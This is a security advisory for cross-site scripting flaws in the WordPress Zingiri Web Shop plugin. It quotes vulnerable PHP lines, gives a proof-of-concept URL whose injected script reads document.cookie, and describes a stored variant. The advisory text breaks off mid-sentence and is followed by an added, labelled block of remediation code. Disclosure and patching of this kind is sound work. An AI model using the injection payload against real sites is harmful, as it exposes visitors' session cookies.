##############################################################################
Wordpress Zingiri Web Shop Plugin <= 2.4.0 Multiple XSS Vulnerabilities

author...............: Mehmet Ince
twitter..............: https://twitter.com/#!/mmetince
mail.................: mehmet.ince@bga.com.tr
software link........: http://www.zingiri.com
affected versions....: tested on 2.3.0 and 2.4.0

# Exploit Title: Wordpress Zingiri Web Shop Plugin <= 2.4.0 Multiple XSS Vulnerabilities
# Google Dork:
# Date: 26 Apr 2012
# Author: Mehmet INCE
# Software Link: http://downloads.wordpress.org/plugin/zingiri-web-shop.2.4.0.zip
# Version: 2.4.0 and older.
# Tested on: versions 2.3.0 and 2.4.0 on Ubuntu 11.10 Server with Firefox browser.
##############################################################################

/*

## BASIC XSS
PS: Exploitable without authentication.

plugins/zingiri-web-shop/zing.inc.php, line 401:

if ($process=='content' && $page!='ajax' && $page!='downldr') echo '
';

Exploit:
http://localhost/wordpress/?page=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

The 'page' variable isn't properly sanitized before being used.

## STORED XSS
PS: The attacker must be logged in to exploit this.

./fws/pages-front/onecheckout.php, lines 27-29:

if (!empty($_POST['notes'])) {
    $notes=$_POST['notes'];
}

and line 348
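
Added example, not part of the original advisory and not the plugin's own code: one way to close both issues is to validate 'page' against a slug pattern on input and HTML-encode 'page' and 'notes' at every output point. The helper names (zws_clean_page, zws_html), the 'main' default, the slug pattern and the sample markup are assumptions made for illustration; inside WordPress, esc_attr() and esc_html() play the role of zws_html().

```php
<?php
// Added illustration (hypothetical helpers, not code from zingiri-web-shop).
// Assumption: 'page' is a short slug that ends up inside an HTML attribute,
// which is what the leading "> in the advisory's PoC suggests.

// Validate on input: accept slug-like values only, otherwise use a default.
function zws_clean_page($raw, $default = 'main')
{
    return (is_string($raw) && preg_match('/\A[a-z0-9_-]{1,64}\z/i', $raw) === 1)
        ? $raw
        : $default;
}

// Escape on output: safe for HTML text and for quoted attribute values.
function zws_html($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Constructed input: the URL-decoded 'page' value from the advisory's PoC.
$poc = '"><script>alert(document.cookie)</script>';

// Reflected case: the PoC fails validation, so the default is emitted.
$page = zws_clean_page($poc);
echo '<div class="zing-' . zws_html($page) . '">', "\n"; // hypothetical markup

// Even without validation, the encoded value can no longer close the attribute.
echo zws_html($poc), "\n";

// Stored case: keep the notes as submitted, encode each time they are rendered.
// Falls back to the constructed PoC string when run outside a web request.
$notes = (isset($_POST['notes']) && is_string($_POST['notes']))
    ? $_POST['notes']
    : $poc;
echo '<textarea name="notes">' . zws_html($notes) . '</textarea>', "\n";
```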